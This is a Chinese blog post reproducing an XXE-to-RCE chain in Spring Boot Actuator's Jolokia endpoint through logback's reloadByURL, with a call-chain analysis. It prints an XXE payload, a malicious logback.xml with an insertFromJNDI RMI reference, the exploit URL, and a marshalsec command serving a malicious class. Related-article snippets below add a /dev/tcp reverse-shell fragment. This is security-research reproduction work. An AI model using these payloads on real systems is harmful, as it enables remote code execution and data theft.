Spring actuator Jolokia XXE RCE

最新推荐文章于 2024-04-08 11:43:18 发布
最新推荐文章于 2024-04-08 11:43:18 发布
阅读量1.6k 收藏
点赞数 1
文章标签: 安全 spring
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_35533398/article/details/108956165
版权

Spring actuator Jolokia XXE RCE

Jolokia允许通过HTTP访问所有已注册的MBean,同时可以使用URL列出所有可用的MBeans操作,访问http://127.0.0.1:8090/jolokia/list即可列出,如下为返回:

格式化后logback Mbean

jolokia在logback JMXConfigurator中提供的“reloadByURL”方法允许从外部URL重新加载日志的记录配置

官网给出了GET和POST两种方式的访问路径以及参数:

 

 

XXE利用:

搭建简单HTTP服务器,用于下载logback.xml(本机1337端口开启服务)

  1. <?xml version="1.0" encoding="utf-8" ?>  
  2. <!DOCTYPE a [ <!ENTITY % remote SYSTEM "http://127.0.0.1:8080/file.dtd">%remote;%int;]>  
  3. <a>&trick;</a>  

file.dtd(8080端口开启服务)

最终访问:

http://localhost:8090/jolokia/exec/ch.qos.logback.classic:Name=default,Type=ch.qos.logback.classic.jmx.JMXConfigurator/reloadByURL/http:!/!/127.0.0.1:1337!/logback.xml

Mbean name:

ch.qos.logback.classic:name=default,Type=ch.qos.logback.classic.jmx.JMXConfigurator/
Operation: reloadByUrl
Params: http:!/!/127.0.0.1!/logback.xml

获取到D:/hello.txt的内容:

 

RCE利用:

  1. 直接访问可触发漏洞的 URL,相当于通过 jolokia 调用 ch.qos.logback.classic.jmx.JMXConfigurator 类的 reloadByURL 方法
  2. 目标机器请求外部日志配置文件 URL 地址,获得恶意 xml 文件内容
  3. 目标机器使用 saxParser.parse 解析 xml 文件 (xxe)
  4. xml 文件中利用 logback 依赖的 insertFormJNDI 标签,允许访问外部 JNDI 服务器地址
  5. 目标机器请求恶意 JNDI 服务器,导致 JNDI 注入,造成 RCE 漏洞

首先服务器上创建可以远程访问的xml文件,logback.xml:

<configuration>
  <insertFromJNDI env-entry-name="rmi://x.x.x.x:1097/jndi" as="appName" />
</configuration>

在此处开启服务,使得xml可以被远程获取到

 

服务器上解析此xml文件时,它会创建与“env-entry-name”参数值中指定的攻击者LDAP/RMI服务器的连接,从而导致JNDI进行解析

同时需要创建JNDI服务:

使用marshalsec工具可以方便地创建JNDI服务:java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.RMIRefServer http://46.110.60.232:8880/#JNDIObject 1097

 

其中JNDIObject类为恶意执行类,当调用RMI服务后会进行代码执行

RMI核心特点之一就是动态加载类,如果当前JVM中没有某个类的定义,它可以从远程URL去下载这个类的class.  RMI服务端将URL传递给客户端,客户端通过HTTP请求下载这些类)

JNDI解析后,进行恶意RMI远程类调用:

此处由于JDK版本问题,未能反弹shell

 

调用链:

首先在JolokiaMvcEndpoint类中设置了根路径为/jolokia

后续路径为任何(/**)时,都会由handle方法进行处理:

 

下一步会进到handleRequest

进入handleRequestInternalà servletInstance.service

进入doGet方法:

接下来为handle处理HttpRequest请求,进入handleGetRequest方法:

此方法会对传入的Uri和pPathinfo进行解析(含有对/的过滤)以及jmx请求的构造:

JmxReq = JmxRequestFactory.createGetRequest是通过 JmxRequestFactory 类创建一个 JmxRequest 的子类(如果请求的类别在 CREATOR_MAP 存在,就会创建对应的子类)

子类对象构造后如下:

通过operation和argument等参数进行jmx的服务访问

HandleRequest中建立MBeanServer同时传入JmxReq请求参数:

到reloadByURL中执行:

跟进doConfigure:建立连接

doConfigure:

外部Xml成功传入,执行saxParser 成功读取到文件内容:

参考:https://xz.aliyun.com/t/4258

 

ThinkPeachi
关注
  • 1
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
Springbootactuator配置不当漏洞RCEjolokia
墨痕诉清风的博客
10-25 4719
日穿扫描扫到一个spring boot actuator 可以看到有jolokia这个端点,再看下jolokia/list,存在type=MBeanFactory 关键字 可以使用jolokia-realm-jndi-rce具体步骤如下 先用python3开一个web服务 python3 -m http.server 8080 编译java利用代码 /** * javac -source 1.5 -target 1.5 JNDIObject.java * * Buil..
Spring Boot Actuator H2 RCE复现
afei001
06-27 428
目录 1.漏洞概述 2.影响版本 3.漏洞等级 4.漏洞复现 4.1 springboot docker vuln环境搭建 4.2 漏洞发现 4.3 漏洞验证 5.漏洞修复 1.漏洞概述 Spring Boot框架是最流行的基于Java的微服务框架之一,当Spring Boot Actuator配置不当可能造成多种RCE,因为Spring Boot 2.x默认使用HikariCP数据库连接池,所以可通过H2数据库实现RCE。 2.影响版本 与版本无关(主...
Spring Boot jolokia 配置不当导致RCE漏洞
Bird&Bird
03-16 4445
访问 /jolokia/list 接口,查看是否存在 ch.qos.logback.classic.jmx.JMXConfigurator 和 reloadByURL 关键词。根据实际情况修改 springboot-realm-jndi-rce.py 脚本中的目标地址,RMI 地址、端口等信息,然后在自己控制的服务器上运行。普通 JNDI 注入受目标 JDK 版本影响,jdk < 6u201/7u191/8u182/11.0.1(LDAP),但相关环境可绕过。环境运行起来后,访问一下/jolokia接口。
Spring actuator Jolokia XXE RCE实现(持续更新)
qq_36737214的博客
12-02 1095
背景:今天想实践一下actuator Jolokia XXE RCE的复现;复现过程中出现了很多的名词之前是没接触到的,就一此次复现做一个契机,补充一下自己需要知道的知识点 文章目录搭建HTTP服务器。供JMXConfigurator中提供的“reloadByURL”方法,引入外部xml文件。解析外部引入的xml,对插入JNDI部分解析并进行创建JNDI服务 需要了解的知识点如下:其中的每一点我基本上都会先一篇文章去整理。 思维导图地址地址:https://www.processon.com/mindm
阿里云java源码-Spring-Boot-Actuator-Exploit:SpringBootActuator(jolokia)XXE/R
06-06
阿里云java源码Spring Boot Actuator (jolokia) XXE/RCE 来自以下文章的信息和有效载荷: 28/02/2020 编辑:另一篇使用 H2 数据库实现 RCE 的文章 在 Spring Boot Actuator < 2.0.0 和 Jolokia 1.6.0 上测试。 如果您可以使用 Spring Boot Actuator 和以下资源访问以下资源/actuator/jolokia或/jolokia : reloadByURL ,这篇文章可以帮助您利用 XXE 并最终利用 RCE。 设置环境: git clone https://github.com/artsploit/actuator-testbed cd actuator-testbed mvn install mvn spring-boot:run 1. jolokia XXE 如果操作reloadByURL存在,则可以从外部 URL 重新加载日志记录配置: logback 背后的 XML 解析器是 SAXParser。 我们可以利用此功能触发基于以下有效负载的 XXE 带外错误: # fil
SpringBoot使用Actuator+Jolokia+Telegraf+Influxdb+Grafana搭建图形化服务监控平台
weixin_33860737的博客
11-12 481
为什么80%的码农都做不了架构师?>>> ...
原 荐 使用Spring Boot ActuatorJolokia和Grafana实现准实时监控
a50295866的博客
07-15 170
原 荐 使用Spring Boot ActuatorJolokia和[可视化]Grafana实现准实时监控. 监控系统: 日志- 基础处理 - 表格 - 可视化一体化解决方案. 不需要业务代码变动. 1. 基础数据,各个维度信息都有. 有些可能还不全. 基于这些数据去做时时可视化. ...
Spring-boot Actuator H2 RCE复现
1
09-07 2005
Spring Boot Actuator H2 RCE复现
spring boot actuator RCE
问题很多的小明
06-27 2512
搭建漏洞环境: git clone https://github.com/veracode-research/actuator-testbed mvn install 或者 mvn spring-boot:run,如果遇到了报错,多半是因为网络问题导致本地mvn仓库下载不完全导致项目依赖解析出问题,解决办法点这里 本地访问一下: 关于路径问题:1.x版本的在根路径下注册路由,2.x版本则需要加/actuator/ 路径 描述 /autoconfig 提供了一
SpringSpring boot 可以通过集成jolokia来使用HTTP形式访问mbean
九师兄
09-20 727
1.概述 在 【SpringSpring 如何更改动态更改运行中某个类的日志级别 以及 xxx 基础上。 springboot可以通过集成jolokia来使用HTTP形式访问mbean 在pom.xml中添加依赖 <dependency> <groupId>org.springframework.boot</groupId> <artifactId>spring-boot-starter-actuator</artifactId&g.
Spring Boot Actuator RCE
weixin_30693683的博客
03-16 790
来看一下IDEA如何调试Spring Boot 先在https://github.com/artsploit/actuator-testbed下载源码 如下命令就能通过maven环境启动 mvn install mvn spring-boot:run 需要但开启调试模式,在pom.xml文件加入如下配置: <configuration> ...
springboot+Jolokia的简单使用
07-30 2955
背景:公司要求需要监控JVM做对应处理,那就只能上JMX了,然后项目本身就使用了springbootJolokia有在springboot中有接入,那就赶紧搞一下这个东西; 下面直接上我的研究步骤: 先把springbootJolokia的项目建起来(服务端) gradle引入依赖:...
Jolokia RCE漏洞利用
baidu_38844729的博客
11-30 3099
利用步骤 1、编译java利用代码,将其命名为Exploit.java,然后编译生成class文件:javac Exploit.java public class Exploit { public ExportObject() { try { System.setSecurityManager(null); java.lang.Runtime.getRuntime().exec("sh -c $@|sh . echo `bash -i >& /dev/tcp
jmx jolokia_使用Jolokia和JMX进行客户端服务器监视
最佳 Java 编程
05-31 866
jmx jolokia Java监视工具的选择非常广泛(由Google提供的随机选择和顺序): javamelody 压力探头 JVisualVM 控制台 贾蒙 Java JMX Nagios插件不适用 此外,还有各种专用工具,例如ActiveMQ , JBoss , Quartz Scheduler , Tomcat / tcServe...
jolokia logback JNDI RCE
12-08 1460
jolokia logback JNDI RCE漏洞分析
高版本JDK下的Jolokia Realm JNDI RCE小记
weixin_40418457的博客
05-05 3152
0x01 引言 在一个阳光明媚的下午,接到一个渗透测试项目。经过一波资产收集,发现一处jolokia,存在 type=MBeanFactory 和 createJNDIRealm。 https://api.example.com//actuator/jolokia/list 你没看错,这个资源必须//才能访问到。 0x02 一波三折的RCE 1. 本着面向github渗透,利用公开的poc打了一波。 引用:https://github.com/LandGrey/SpringBootVulExploit#
SpringBoot历史漏洞复现_springboot漏洞(1),赶紧学起来
最新发布
m0_60707685的博客
04-08 1058
2.找到属性名,使用bp抓包,抓/jolokia的包,发送到重发模块,修改包为post请求,把传输的变量改json,然后加上下面的poc,重放这个包,明文值结果包含 在 response 数据包中的 value 键中。当我学到一定基础,有自己的理解能力的时候,会去阅读一些前辈整理的书籍或者手写的笔记资料,这些笔记详细记载了他们对一些技术点的理解,这些理解是比较独到,可以学到不一样的思路。观看零基础学习视频,看视频学习是最快捷也是最有效果的方式,跟着视频中老师的思路,从基础到深入,还是很容易入门的。
jolokia Realm JNDI RCE分析
12-09 2621
jolokia Realm JNDI RCE分析
jdk8u121以上 jolokia Realm JNDI RCE解决
为之的博客
12-02 1340
我的版本为java1.8.0_152,比121高,但我想对其进行debug,又不想重装jdk或者虚拟机远程debug,就找了半天怎么解决,然后百度都是告诉你 com.sun.jndi.rmi.object.trustURLCodebase设置为true就好了,就始终没人教教我这个菜鸡怎么设置。 Environment要点一下扩展开,在里面输入命令点击OK就解决了,哎,太菜了。 -Dcom.sun.jndi.rmi.object.trustURLCodebase=true ...
Spring Boot Actuator深度解析:微服务监控实践
"本文介绍了Spring Boot ActuatorSpring Boot应用中的使用,强调了微服务监控的重要性,并提供了添加Actuator依赖的示例。" Spring Boot ActuatorSpring Boot框架的一部分,它提供了一组丰富的端点(endpoints...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值